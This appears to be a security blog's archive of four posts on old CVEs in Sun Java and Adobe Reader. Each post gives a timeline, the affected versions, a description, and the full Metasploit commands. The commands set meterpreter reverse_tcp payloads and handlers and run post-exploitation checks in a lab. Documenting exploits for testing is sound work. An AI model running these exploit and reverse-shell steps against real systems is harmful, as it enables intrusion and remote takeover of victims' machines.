Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2008-5353 : Sun Java Calendar Deserialization Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported by Sami Koivu the 2008-08-01
Vulnerability fixed by Sun the 2008-12-03
PoC provided the 2009-05-19
Metasploit PoC provided by hdm the 2009-06-16

    PoC provided by :

Sami Koivu
sf
hdm

    Reference(s) :

CVE-2008-5353

    Affected version(s) :

JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

    Commands :

use exploit/multi/browser/java_calendar_dese­rialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported by Matthias Kaiser between ZDI to Oracle the 2010-04-05
Coordinated public release of advisory the 2010-10-12
Metasploit PoC provided by egypt the 2010-11-19

    PoC provided by :

Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-3563

    Affected version(s) :

Java 6 Standard Edition prior to update 22

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

    Commands :

use exploit/windows/browser/java_basicservic­e_impl
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2008-2992 : Adobe Acrobat util.printf Buffer Overflow

Exploits, Metasploit, ,

Timeline :

Vulnerability reported by Peter Vreugdenhil to ZDI
Vulnerability reported from ZDI to the vendor the 2008-01-21
Coordinated public release the 2008-11-04
Milw0rm PoC provided by Debasis Mohanty the 2008-11-05
Metasploit PoC provided by Mario Ceballos the 2008-12-03

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2008-2992

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional prior to 8.1.3

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.2

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional prior to 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf entry, an attacker may be able to execute arbitrary code

    Commands :

use exploit/windows/fileformat/adobe_utilpri­ntf
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-5659 : Adobe Acrobat Collab.collectEmailInfo Buffer Overflow

Exploits, Metasploit, ,

Timeline :

Vulnerability reported by Greg MacManus to IDefense Labs
Vulnerability reported from IDefense Labs to the vendor the 2007-10-10
Adobe release version 8.1.2 the 2008-02-06
Exploit discovered in the wild the 2008-02-08
Public disclosure the 2008-02-08
Metasploit PoC provided by MC the 2009-03-28

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2007-5659
EDB-ID-11987

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 8.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.1

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_collect­emailinfo
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig